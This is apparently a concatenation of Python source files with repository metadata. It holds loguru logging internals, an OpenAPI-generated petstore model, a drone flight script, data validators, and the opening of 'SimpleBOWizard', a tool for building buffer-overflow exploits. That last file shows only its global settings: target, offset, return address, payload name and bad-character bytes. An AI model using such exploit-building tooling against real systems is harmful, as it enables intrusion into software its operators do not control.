    determine the module's ``__name__`` value. In such situation, ``record["name"]`` will be
    equal to ``None``, this is why ``None`` is also a valid argument.

    Parameters
    ----------
    name : |str| or ``None``
        The name of the parent module to disable.

    Examples
    --------
    >>> logger.info("Allowed message by default")
    [22:21:55] Allowed message by default
    >>> logger.disable("my_library")
    >>> logger.info("While publishing a library, don't forget to disable logging")
    """
    self._change_activation(name, status=False)
def enable(self, name):
    """Enable logging of messages coming from ``name`` module and its children.

    Since imported libraries usually disable their own `Loguru` messages, this
    function lets users opt back in and receive them anyway.

    To enable all logs regardless of the module they are coming from, an empty string ``""`` can
    be passed.

    Parameters
    ----------
    name : |str| or ``None``
        The name of the parent module to re-allow.

    Examples
    --------
    >>> logger.disable("__main__")
    >>> logger.info("Disabled, so nothing is logged.")
    >>> logger.enable("__main__")
    >>> logger.info("Re-enabled, messages are logged.")
    [22:46:12] Re-enabled, messages are logged.
    """
    self._change_activation(name, status=True)
def configure(self, *, handlers=None, levels=None, extra=None, patcher=None, activation=None):
    """Configure the core logger.

    It should be noted that ``extra`` values set using this function are available across all
    modules, so this is the best way to set overall default values.

    Parameters
    ----------
    handlers : |list| of |dict|, optional
        A list of each handler to be added. The list should contain dicts of params passed to
        the |add| function as keyword arguments. If not ``None``, all previously added
        handlers are first removed.
    levels : |list| of |dict|, optional
        A list of each level to be added or updated. The list should contain dicts of params
        passed to the |level| function as keyword arguments. This will never remove previously
        created levels.
    extra : |dict|, optional
        A dict containing additional parameters bound to the core logger, useful to share
        common properties if you call |bind| in several of your files modules. If not ``None``,
        this will remove previously configured ``extra`` dict.
    patcher : |callable|_, optional
        A function that will be applied to the record dict of each logged messages across all
        modules using the logger. It should modify the dict in-place without returning anything.
        The function is executed prior to the one possibly added by the |patch| method. If not
        ``None``, this will replace previously configured ``patcher`` function.
    activation : |list| of |tuple|, optional
        A list of ``(name, state)`` tuples which denotes which loggers should be enabled (if
        ``state`` is ``True``) or disabled (if ``state`` is ``False``). The calls to |enable|
        and |disable| are made accordingly to the list order. This will not modify previously
        activated loggers, so if you need a fresh start prepend your list with ``("", False)``
        or ``("", True)``.

    Returns
    -------
    :class:`list` of :class:`int`
        A list containing the identifiers of added sinks (if any).

    Examples
    --------
    >>> logger.configure(
    ...     handlers=[
    ...         dict(sink=sys.stderr, format="[{time}] {message}"),
    ...         dict(sink="file.log", enqueue=True, serialize=True),
    ...     ],
    ...     levels=[dict(name="NEW", no=13, icon="¤", color="")],
    ...     extra={"common_to_all": "default"},
    ...     patcher=lambda record: record["extra"].update(some_value=42),
    ...     activation=[("my_module.secret", False), ("another_library.module", True)],
    ... )
    [1, 2]

    >>> # Set a default "extra" dict to logger across all modules, without "bind()"
    >>> extra = {"context": "foo"}
    >>> logger.configure(extra=extra)
    >>> logger.add(sys.stderr, format="{extra[context]} - {message}")
    >>> logger.info("Context without bind")
    >>> # => "foo - Context without bind"
    >>> logger.bind(context="bar").info("Suppress global context")
    >>> # => "bar - Suppress global context"
    """
    # Passing "handlers" (even an empty list) wipes all existing handlers
    # before adding the new ones; passing nothing leaves them untouched.
    if handlers is not None:
        self.remove()
    else:
        handlers = []

    if levels is not None:
        for params in levels:
            self.level(**params)

    if patcher is not None:
        with self._core.lock:
            self._core.patcher = patcher

    if extra is not None:
        with self._core.lock:
            # Mutate in-place so loggers sharing this core see the new dict.
            self._core.extra.clear()
            self._core.extra.update(extra)

    if activation is not None:
        # Applied in list order, so later entries override earlier ones.
        for name, state in activation:
            if state:
                self.enable(name)
            else:
                self.disable(name)

    return [self.add(**params) for params in handlers]
def _change_activation(self, name, status):
    """Shared implementation of enable()/disable().

    Updates the per-module activation rules ("activation_list") and the cached
    per-module decisions ("enabled") so that "name" and all its sub-modules are
    set to "status".
    """
    if not (name is None or isinstance(name, str)):
        raise TypeError(
            "Invalid name, it should be a string (or None), not: '%s'" % type(name).__name__
        )

    with self._core.lock:
        enabled = self._core.enabled.copy()

        # "None" targets records whose module name could not be determined;
        # it is tracked separately from the string-prefix rules.
        if name is None:
            for n in enabled:
                if n is None:
                    enabled[n] = status
            self._core.activation_none = status
            self._core.enabled = enabled
            return

        # A trailing dot makes prefix matching operate on whole module path
        # components ("foo." matches "foo.bar" but not "foobar").
        if name != "":
            name += "."

        # Drop existing rules for this module and its children; the new rule
        # supersedes them.
        activation_list = [
            (n, s) for n, s in self._core.activation_list if n[: len(name)] != name
        ]

        # Only record a new rule if it differs from what the closest parent
        # rule already implies (everything is enabled by default, hence the
        # special case for ("", True)).
        parent_status = next((s for n, s in activation_list if name[: len(n)] == n), None)
        if parent_status != status and not (name == "" and status is True):
            activation_list.append((name, status))

            def modules_depth(x):
                return x[0].count(".")

            # Deepest (most specific) rules first, so lookups in "_log()" hit
            # the most specific matching prefix.
            activation_list.sort(key=modules_depth, reverse=True)

        # Refresh the cached decision of every already-seen module affected.
        for n in enabled:
            if n is not None and (n + ".")[: len(name)] == name:
                enabled[n] = status

        self._core.activation_list = activation_list
        self._core.enabled = enabled
@staticmethod
def parse(file, pattern, *, cast={}, chunk=2 ** 16):
    """Parse raw logs and extract each entry as a |dict|.

    The logging format has to be specified as the regex ``pattern``, it will then be
    used to parse the ``file`` and retrieve each entry based on the named groups present
    in the regex.

    Parameters
    ----------
    file : |str|, |Path| or |file-like object|_
        The path of the log file to be parsed, or an already opened file object.
    pattern : |str| or |re.Pattern|_
        The regex to use for logs parsing, it should contain named groups which will be included
        in the returned dict.
    cast : |callable|_ or |dict|, optional
        A function that should convert in-place the regex groups parsed (a dict of string
        values) to more appropriate types. If a dict is passed, it should be a mapping between
        keys of parsed log dict and the function that should be used to convert the associated
        value.
    chunk : |int|, optional
        The number of bytes read while iterating through the logs, this avoids having to load
        the whole file in memory.

    Yields
    ------
    :class:`dict`
        The dict mapping regex named groups to matched values, as returned by |match.groupdict|
        and optionally converted according to ``cast`` argument.

    Examples
    --------
    >>> reg = r"(?P<lvl>[0-9]+): (?P<msg>.*)"  # If log format is "{level.no} - {message}"
    >>> for e in logger.parse("file.log", reg):  # A file line could be "10 - A debug message"
    ...     print(e)  # => {'lvl': '10', 'msg': 'A debug message'}

    >>> caster = dict(lvl=int)  # Parse 'lvl' key as an integer
    >>> for e in logger.parse("file.log", reg, cast=caster):
    ...     print(e)  # => {'lvl': 10, 'msg': 'A debug message'}

    >>> def cast(groups):
    ...     if "date" in groups:
    ...         groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S")
    ...
    >>> with open("file.log") as file:
    ...     for log in logger.parse(file, reg, cast=cast):
    ...         print(log["date"], log["something_else"])
    """
    # Note: the "cast={}" default is safe because the dict is never mutated.
    if isinstance(file, (str, PathLike)):
        should_close = True
        fileobj = open(str(file))
    elif hasattr(file, "read") and callable(file.read):
        should_close = False
        fileobj = file
    else:
        raise TypeError(
            "Invalid file, it should be a string path or a file object, not: '%s'"
            % type(file).__name__
        )

    # Bug fix: everything after opening the file runs under try/finally so the
    # file is closed even when validation of "cast"/"pattern" raises, when
    # matching fails mid-way, or when the consumer abandons the generator
    # early (GeneratorExit also triggers the "finally" clause). Previously the
    # handle was only closed after a complete, successful iteration.
    try:
        if isinstance(cast, dict):

            def cast_function(groups):
                # Convert, in place, only the groups listed in the mapping.
                for key, converter in cast.items():
                    if key in groups:
                        groups[key] = converter(groups[key])

        elif callable(cast):
            cast_function = cast
        else:
            raise TypeError(
                "Invalid cast, it should be a function or a dict, not: '%s'" % type(cast).__name__
            )

        try:
            regex = re.compile(pattern)
        except TypeError:
            raise TypeError(
                "Invalid pattern, it should be a string or a compiled regex, not: '%s'"
                % type(pattern).__name__
            ) from None

        matches = Logger._find_iter(fileobj, regex, chunk)

        for match in matches:
            groups = match.groupdict()
            cast_function(groups)
            yield groups
    finally:
        if should_close:
            fileobj.close()
@staticmethod
def _find_iter(fileobj, regex, chunk):
    """Yield regex matches found in *fileobj*, reading it *chunk* bytes at a time."""
    # Reading zero bytes yields an empty value of the right type, so the
    # buffer is a "str" for text files and "bytes" for binary ones.
    pending = fileobj.read(0)
    while True:
        piece = fileobj.read(chunk)
        pending += piece
        found = list(regex.finditer(pending))
        if not piece:
            # End of file reached: nothing can extend further, flush it all.
            yield from found
            return
        if len(found) > 1:
            # Hold back the last match: it might continue into the next chunk.
            cut = found[-2].end()
            pending = pending[cut:]
            yield from found[:-1]
def _log(self, level_id, static_level_no, from_decorator, options, message, args, kwargs):
    """Build the log record for one logging call and dispatch it to every handler.

    This is the single funnel used by all public logging methods.
    """
    core = self._core

    # Fast path: nothing to do when no sink is registered.
    if not core.handlers:
        return

    (exception, depth, record, lazy, colors, raw, capture, patcher, extra) = options

    # "+ 2" skips this frame and the public wrapper (e.g. "info()") so the
    # record points at the user's calling frame; "depth" (from opt()) shifts
    # it further up on demand.
    frame = get_frame(depth + 2)

    try:
        name = frame.f_globals["__name__"]
    except KeyError:
        name = None

    # "core.enabled" caches the enable/disable decision per module name; on a
    # cache miss, derive it from the activation rules and memoize it.
    try:
        if not core.enabled[name]:
            return
    except KeyError:
        enabled = core.enabled
        if name is None:
            status = core.activation_none
            enabled[name] = status
            if not status:
                return
        else:
            dotted_name = name + "."
            # "activation_list" is ordered most-specific-first, so the first
            # matching prefix decides.
            for dotted_module_name, status in core.activation_list:
                if dotted_name[: len(dotted_module_name)] == dotted_module_name:
                    if status:
                        break
                    enabled[name] = False
                    return
            enabled[name] = True

    current_datetime = aware_now()

    # "level_id is None" means the call used a plain numeric severity with no
    # registered level attached.
    if level_id is None:
        level_icon = " "
        level_no = static_level_no
        level_name = "Level %d" % level_no
    else:
        try:
            level_name, level_no, _, level_icon = core.levels[level_id]
        except KeyError:
            raise ValueError("Level '%s' does not exist" % level_id) from None

    # Cheap global threshold check before building the full record.
    if level_no < core.min_level:
        return

    code = frame.f_code
    file_path = code.co_filename
    file_name = basename(file_path)
    thread = current_thread()
    process = current_process()
    elapsed = current_datetime - start_time

    # Normalize the "exception" option (instance, (type, value, tb) tuple, or
    # truthy flag meaning "use sys.exc_info()") into a RecordException.
    if exception:
        if isinstance(exception, BaseException):
            type_, value, traceback = (type(exception), exception, exception.__traceback__)
        elif isinstance(exception, tuple):
            type_, value, traceback = exception
        else:
            type_, value, traceback = sys.exc_info()
        exception = RecordException(type_, value, traceback)
    else:
        exception = None

    log_record = {
        "elapsed": elapsed,
        "exception": exception,
        "extra": {**core.extra, **context.get(), **extra},
        "file": RecordFile(file_name, file_path),
        "function": code.co_name,
        "level": RecordLevel(level_name, level_no, level_icon),
        "line": frame.f_lineno,
        "message": str(message),
        "module": splitext(file_name)[0],
        "name": name,
        "process": RecordProcess(process.ident, process.name),
        "thread": RecordThread(thread.ident, thread.name),
        "time": current_datetime,
    }

    # With opt(lazy=True) the arguments are zero-argument callables, evaluated
    # only now that the message is known to be emitted.
    if lazy:
        args = [arg() for arg in args]
        kwargs = {key: value() for key, value in kwargs.items()}

    if capture and kwargs:
        log_record["extra"].update(kwargs)

    if record:
        if "record" in kwargs:
            raise TypeError(
                "The message can't be formatted: 'record' shall not be used as a keyword "
                "argument while logger has been configured with '.opt(record=True)'"
            )
        kwargs.update(record=log_record)

    # Message formatting: colorized markup, plain str.format(), or verbatim.
    if colors:
        if args or kwargs:
            colored_message = Colorizer.prepare_message(message, args, kwargs)
        else:
            colored_message = Colorizer.prepare_simple_message(str(message))
        log_record["message"] = colored_message.stripped
    elif args or kwargs:
        colored_message = None
        log_record["message"] = message.format(*args, **kwargs)
    else:
        colored_message = None

    # Core-level patcher (configure()) runs before the per-logger one (patch()).
    if core.patcher:
        core.patcher(log_record)

    if patcher:
        patcher(log_record)

    for handler in core.handlers.values():
        handler.emit(log_record, level_id, from_decorator, raw, colored_message)
def trace(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'TRACE'`` severity."""
    options = __self._options
    __self._log("TRACE", None, False, options, __message, args, kwargs)
def debug(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'DEBUG'`` severity."""
    options = __self._options
    __self._log("DEBUG", None, False, options, __message, args, kwargs)
def info(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'INFO'`` severity."""
    options = __self._options
    __self._log("INFO", None, False, options, __message, args, kwargs)
def success(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'SUCCESS'`` severity."""
    options = __self._options
    __self._log("SUCCESS", None, False, options, __message, args, kwargs)
def warning(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'WARNING'`` severity."""
    options = __self._options
    __self._log("WARNING", None, False, options, __message, args, kwargs)
def error(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'ERROR'`` severity."""
    options = __self._options
    __self._log("ERROR", None, False, options, __message, args, kwargs)
def critical(__self, __message, *args, **kwargs):
    r"""Emit *message*, formatted with ``args``/``kwargs``, at ``'CRITICAL'`` severity."""
    options = __self._options
    __self._log("CRITICAL", None, False, options, __message, args, kwargs)
def exception(__self, __message, *args, **kwargs):
    r"""Log *message* at ``'ERROR'`` severity along with the active exception info."""
    # Force the "exception" option (first slot) on, keeping the others intact.
    exc_options = (True, *__self._options[1:])
    __self._log("ERROR", None, False, exc_options, __message, args, kwargs)
def log(__self, __level, __message, *args, **kwargs):
    r"""Log *message*, formatted with ``args``/``kwargs``, at the given *level* (name or number)."""
    level_id, static_no = __self._dynamic_level(__level)
    __self._log(level_id, static_no, False, __self._options, __message, args, kwargs)
@staticmethod
@functools.lru_cache(maxsize=32)
def _dynamic_level(level):
    """Normalize a user-supplied level (name or number) to a (level_id, static_no) pair.

    Cached because the same handful of levels recurs on every logging call.
    """
    if isinstance(level, str):
        return (level, None)
    if not isinstance(level, int):
        raise TypeError(
            "Invalid level, it should be an integer or a string, not: '%s'" % type(level).__name__
        )
    if level < 0:
        raise ValueError(
            "Invalid level value, it should be a positive integer, not: %d" % level
        )
    return (None, level)
def start(self, *args, **kwargs):
    """Deprecated alias of |add|, kept for backward compatibility.

    Warnings
    --------
    .. deprecated:: 0.2.2
        ``start()`` will be removed in Loguru 1.0.0, it is replaced by ``add()`` which is a less
        confusing name.
    """
    deprecation = "The 'start()' method is deprecated, please use 'add()' instead"
    warnings.warn(deprecation, DeprecationWarning)
    return self.add(*args, **kwargs)
def stop(self, *args, **kwargs):
    """Deprecated alias of |remove|, kept for backward compatibility.

    Warnings
    --------
    .. deprecated:: 0.2.2
        ``stop()`` will be removed in Loguru 1.0.0, it is replaced by ``remove()`` which is a less
        confusing name.
    """
    deprecation = "The 'stop()' method is deprecated, please use 'remove()' instead"
    warnings.warn(deprecation, DeprecationWarning)
    return self.remove(*args, **kwargs)
| 45.302882
| 100
| 0.513301
|
4a1129432f547f0030c5ef80aabd87c86aff60d3
| 9,054
|
py
|
Python
|
samples/openapi3/client/petstore/python/petstore_api/model/composed_one_of_number_with_validations.py
|
mkj-is/openapi-generator
|
71a8e0afda1e2a0876d166b8dba4c7ba0fe0a5a5
|
[
"Apache-2.0"
] | 4
|
2021-02-20T21:39:04.000Z
|
2021-08-24T13:54:15.000Z
|
samples/openapi3/client/petstore/python/petstore_api/model/composed_one_of_number_with_validations.py
|
mkj-is/openapi-generator
|
71a8e0afda1e2a0876d166b8dba4c7ba0fe0a5a5
|
[
"Apache-2.0"
] | 27
|
2021-04-07T07:22:02.000Z
|
2022-03-31T05:10:11.000Z
|
samples/openapi3/client/petstore/python/petstore_api/model/composed_one_of_number_with_validations.py
|
mkj-is/openapi-generator
|
71a8e0afda1e2a0876d166b8dba4c7ba0fe0a5a5
|
[
"Apache-2.0"
] | 2
|
2021-06-11T15:24:43.000Z
|
2021-06-13T12:20:31.000Z
|
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from petstore_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
    # Deferred (first-use) imports: generated model modules can reference each
    # other, so importing at module load time would create circular imports.
    # The classes are published through globals() so later code in this module
    # can refer to them by bare name.
    from petstore_api.model.animal import Animal
    from petstore_api.model.number_with_validations import NumberWithValidations
    globals()['Animal'] = Animal
    globals()['NumberWithValidations'] = NumberWithValidations
class ComposedOneOfNumberWithValidations(ModelComposed):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.

    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """

    # No enum-constrained attributes on this model.
    allowed_values = {
    }

    # No extra value validations (length/range/regex) on this model.
    validations = {
    }

    @cached_property
    def additional_properties_type():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        """
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type,)  # noqa: E501

    # This schema does not allow null.
    _nullable = False

    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded

        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        lazy_import()
        return {
            'color': (str,),  # noqa: E501
            'class_name': (str,),  # noqa: E501
        }

    @cached_property
    def discriminator():
        # No discriminator defined for this composed (oneOf) schema.
        return None

    # Python attribute name -> JSON key in the OpenAPI document.
    attribute_map = {
        'color': 'color',  # noqa: E501
        'class_name': 'className',  # noqa: E501
    }

    # Internal bookkeeping attributes of the model machinery; these are set
    # directly on the instance rather than routed through the data store.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
        '_composed_instances',
        '_var_name_to_model_instances',
        '_additional_properties_model_instances',
    ])

    @convert_js_args_to_python_args
    def __init__(self, *args, **kwargs):  # noqa: E501
        """ComposedOneOfNumberWithValidations - a model defined in OpenAPI

        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                will be type checked and a TypeError will be
                raised if the wrong type is input.
                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                drill down to the model in received_data
                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                are serialized names, as specified in the OpenAPI document.
                False if the variable names in the input data
                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                deserializing a file_type parameter.
                If passed, type conversion is attempted
                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                classes that we have traveled through so that
                if we see that class again we will not use its
                discriminator again.
                When traveling through a discriminator, the
                composed schema that is
                is traveled through is added to this set.
                For example if Animal has a discriminator
                petType and we pass in "Dog", and the class Dog
                allOf includes Animal, we move through Animal
                once using the discriminator, and pick Dog.
                Then in Dog, we will make an instance of the
                Animal class but this time we won't travel
                through its discriminator because we passed in
                _visited_composed_classes = (Animal,)
            color (str): [optional] if omitted the server will use the default value of "red"  # noqa: E501
            class_name (str): [optional]  # noqa: E501
        """

        # Pop framework-control kwargs before treating the rest as model data.
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())

        # Model properties must be passed by keyword only.
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        # Record this class so discriminator traversal is not repeated.
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)

        constant_args = {
            '_check_type': _check_type,
            '_path_to_item': _path_to_item,
            '_spec_property_naming': _spec_property_naming,
            '_configuration': _configuration,
            '_visited_composed_classes': self._visited_composed_classes,
        }
        required_args = {
        }
        model_args = {}
        model_args.update(required_args)
        model_args.update(kwargs)
        # Resolve which oneOf/anyOf/allOf component schemas the kwargs match.
        composed_info = validate_get_composed_info(
            constant_args, model_args, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        unused_args = composed_info[3]

        for var_name, var_value in required_args.items():
            setattr(self, var_name, var_value)
        for var_name, var_value in kwargs.items():
            if var_name in unused_args and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        not self._additional_properties_model_instances:
                # discard variable.
                continue
            setattr(self, var_name, var_value)

    @cached_property
    def _composed_schemas():
        # we need this here to make our import statements work
        # we must store _composed_schemas in here so the code is only run
        # when we invoke this method. If we kept this at the class
        # level we would get an error because the class level
        # code would be run when this module is imported, and these composed
        # classes don't exist yet because their module has not finished
        # loading
        lazy_import()
        return {
          'anyOf': [
          ],
          'allOf': [
          ],
          'oneOf': [
              Animal,
              NumberWithValidations,
              date,
              none_type,
          ],
        }
| 39.537118
| 174
| 0.59609
|
4a112963b0e747d944e6b74d4e5aef52b1223fce
| 350
|
py
|
Python
|
MaidenFlight.py
|
IanC95/Master18-fleet-drones
|
f4a06bcbbf991a5ab163a95a458fa0f0a4184d8f
|
[
"MIT"
] | null | null | null |
MaidenFlight.py
|
IanC95/Master18-fleet-drones
|
f4a06bcbbf991a5ab163a95a458fa0f0a4184d8f
|
[
"MIT"
] | null | null | null |
MaidenFlight.py
|
IanC95/Master18-fleet-drones
|
f4a06bcbbf991a5ab163a95a458fa0f0a4184d8f
|
[
"MIT"
] | null | null | null |
"""Maiden-flight script for a Parrot AR.Drone driven via the ps_drone library.

Takes off, performs a short forward/backward hop, a left turn, and lands.
Timings (time.sleep) pace the flight; ps_drone commands are asynchronous.
"""
import time

import ps_drone

drone = ps_drone.Drone()
drone.startup()

drone.takeoff()
time.sleep(7.5)  # give the drone time to reach a stable hover

drone.moveForward()
time.sleep(1)
drone.stop()
time.sleep(2)

drone.moveBackward(0.25)  # 25% speed
time.sleep(1.5)
drone.stop()
time.sleep(2)

drone.setSpeed(1.0)
# Fix: original used the Python 2 print statement (`print drone.setSpeed()`),
# a SyntaxError under Python 3. The call form works on both 2 and 3.
print(drone.setSpeed())

drone.turnLeft()
time.sleep(2)
drone.stop()
time.sleep(2)

drone.land()
| 12.5
| 24
| 0.731429
|
4a1129b7635c437f30c679bb5e1988fda7761ab8
| 1,142
|
py
|
Python
|
bw2regional/validate.py
|
brightway-lca/brightway2-regional-copy
|
6aab66e76992dae89c48d60f13bf9c8baef17420
|
[
"BSD-3-Clause"
] | 1
|
2022-03-02T10:33:39.000Z
|
2022-03-02T10:33:39.000Z
|
bw2regional/validate.py
|
brightway-lca/brightway2-regional-copy
|
6aab66e76992dae89c48d60f13bf9c8baef17420
|
[
"BSD-3-Clause"
] | 3
|
2020-03-03T15:44:56.000Z
|
2021-07-21T13:34:29.000Z
|
bw2regional/validate.py
|
brightway-lca/brightway2-regional-copy
|
6aab66e76992dae89c48d60f13bf9c8baef17420
|
[
"BSD-3-Clause"
] | 1
|
2022-02-14T14:04:51.000Z
|
2022-02-14T14:04:51.000Z
|
from bw2data.validate import maybe_uncertainty, valid_tuple
from voluptuous import Any, Invalid, Schema
_maybe_uncertainty = Schema(maybe_uncertainty)
_loading_value = Schema(Any(str, valid_tuple))
def uncertainty_list(obj):
    """Validate a loading value: a 2-list of [uncertainty dict, spatial unit].

    Returns ``obj`` unchanged on success; raises ``voluptuous.Invalid``
    otherwise. The original used ``assert`` (stripped under ``python -O``)
    and a bare ``except:`` (which also swallows KeyboardInterrupt/SystemExit);
    both are replaced while preserving the raise-Invalid-on-any-failure
    contract.
    """
    try:
        if not (isinstance(obj, list) and len(obj) == 2):
            raise ValueError("expected a 2-element list")
        _maybe_uncertainty(obj[0])
        _loading_value(obj[1])
    except Exception:
        raise Invalid("%s is not a valid loading value" % obj)
    return obj
def float_as_last(obj):
    """Validate an intersection value: a 3-list whose last item is numeric.

    Returns ``obj`` unchanged on success; raises ``voluptuous.Invalid``
    otherwise. Replaces the original ``assert``-based checks (stripped under
    ``python -O``) and the bare ``except:`` with explicit, short-circuiting
    type/length checks — no exception machinery needed for the happy path.
    """
    if not (isinstance(obj, list)
            and len(obj) == 3
            and isinstance(obj[2], (float, int))):
        raise Invalid("%s is not a valid intersection value" % obj)
    return obj
def xtable_data(obj):
    """Validate an xtable value: (float, (str, str-or-int)).

    Returns ``obj`` unchanged on success; raises ``voluptuous.Invalid``
    otherwise. Indexing into an arbitrary ``obj`` can raise, so the structural
    probe is guarded — but only against the specific exceptions indexing can
    produce, not a bare ``except:`` as before. ``assert`` is avoided because
    it is stripped under ``python -O``.
    """
    try:
        ok = (isinstance(obj, (tuple, list))
              and isinstance(obj[0], float)
              and isinstance(obj[1][0], str)
              and isinstance(obj[1][1], (str, int)))
    except (IndexError, KeyError, TypeError):
        ok = False
    if not ok:
        raise Invalid("%s is not a valid xtable value" % obj)
    return obj
# Public Schema objects: each validates a whole list by applying the
# corresponding element validator to every item.
loading_validator = Schema([uncertainty_list])        # lists of [uncertainty, spatial unit]
intersection_validator = Schema([float_as_last])      # lists of [id, id, numeric area]
xtable_validator = Schema([xtable_data])              # lists of (float, (name, id))
| 26.55814
| 67
| 0.662872
|
4a112ae04246320ceefd065a7ad90adcf8f0bf29
| 59,531
|
py
|
Python
|
SimpleBOWizard.py
|
nosce/SimpleBOWizard
|
281d37e82a12a5035be1afb0edf01deccbc9d926
|
[
"MIT"
] | null | null | null |
SimpleBOWizard.py
|
nosce/SimpleBOWizard
|
281d37e82a12a5035be1afb0edf01deccbc9d926
|
[
"MIT"
] | null | null | null |
SimpleBOWizard.py
|
nosce/SimpleBOWizard
|
281d37e82a12a5035be1afb0edf01deccbc9d926
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# =============================================================================
# The SimpleBOWizard guides through all steps required for a simple buffer
# overflow. The user can enter all required information step by step.
# Based on this, the exploit file will be created and updated.
# =============================================================================
# Author : nosce
# Date : February 2020
# License : MIT
# Status : Prototype
# =============================================================================
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
from concurrent.futures import ThreadPoolExecutor
import struct
import sys
import time
import os
import re
import shlex
import shutil
import textwrap
import socket as so
import subprocess as sub
from binascii import unhexlify
from fileinput import FileInput
# -----------------------------------------------------------------------------
# Global variables and constants
# -----------------------------------------------------------------------------
_DEFAULT_POOL = ThreadPoolExecutor()
# Formatting for messages -----------------------------------------------------
BOLD = '\033[1m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[31m'
GRAY = '\033[37m'
CYAN = '\033[36m'
FORMAT_END = '\033[0m'
BLUE_BACK = '\x1b[0;30;44m'
BACK_END = '\x1b[0m'
# Buffer overflow values ------------------------------------------------------
# Global
bo_type = 'local'
current_step = -1
buffer = b''
# Local BO
file_ext = 'py'
file_name = 'exploit'
file = file_name + '.' + file_ext if file_ext else file_name
# Remote BO
target = '127.0.0.1'
port = 80
start_command = b''
end_command = b''
# Fuzzing
fuzz_buffer = []
fuzz_buff_length = 30
fuzz_char = b'A'
increase_step = 200
# Pattern
pattern_length = 2000
# Buffer
buf_length = 2000
offset = 1000
badchars = []
nop_sled = 16
nop_padding = 16
return_address = struct.pack('<L', 0x12345678)
# Payload
arch = 'x86'
platform = 'windows'
payload = 'windows/messagebox'
connect_ip = '127.0.0.1'
connect_port = 4444
payload_code = b''
char_string = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
char_string += b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
char_string += b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
char_string += b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
char_string += b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
char_string += b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
char_string += b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
char_string += b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
char_string += b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
char_string += b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
char_string += b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
